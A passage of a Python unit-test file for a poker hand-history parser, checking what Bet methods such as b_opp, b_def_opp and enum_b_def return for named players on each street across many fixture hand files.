self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
def test_b_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__bug1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'AIONCMA1988'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
file = '__bug3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'turn', 'Smitty03300'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'Sfera2'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'Zwidawurzn'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'Sfera2'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'Zwidawurzn'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'Sfera2'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'Zwidawurzn'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'Chodemuncher'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'Krumi1703'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'Chodemuncher'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'Krumi1703'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'Chodemuncher'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'Krumi1703'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_b(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = Bet(hand, 'flop', 'Sfera2')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'flop', 'Zwidawurzn')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'turn', 'Sfera2')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'turn', 'Zwidawurzn')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'river', 'Sfera2')
self.assertEqual(True, tmp.b(), msg=file)
tmp = Bet(hand, 'river', 'Zwidawurzn')
self.assertEqual(False, tmp.b(), msg=file)
file = 'f2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = Bet(hand, 'flop', 'kr123445')
self.assertEqual(True, tmp.b(), msg=file)
tmp = Bet(hand, 'flop', 'Zwidawurzn')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'flop', 'Sfera2')
self.assertEqual(False, tmp.b(), msg=file)
def test_b_def_opp(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'river', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'river', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'f1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'f12.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-7.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
def test_enum_b_def(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'river', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'river', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('call', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'f1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('2bet', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'f12.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('call', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('call', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('2bet', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('call', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-7.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('2bet', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
def test_b_raise_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'bug_b_raise_def_opp.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'OceanBlue100'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = '__bug5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'river', 'Action_Gibi'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'a1-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a1-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a1-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a5-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a6-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
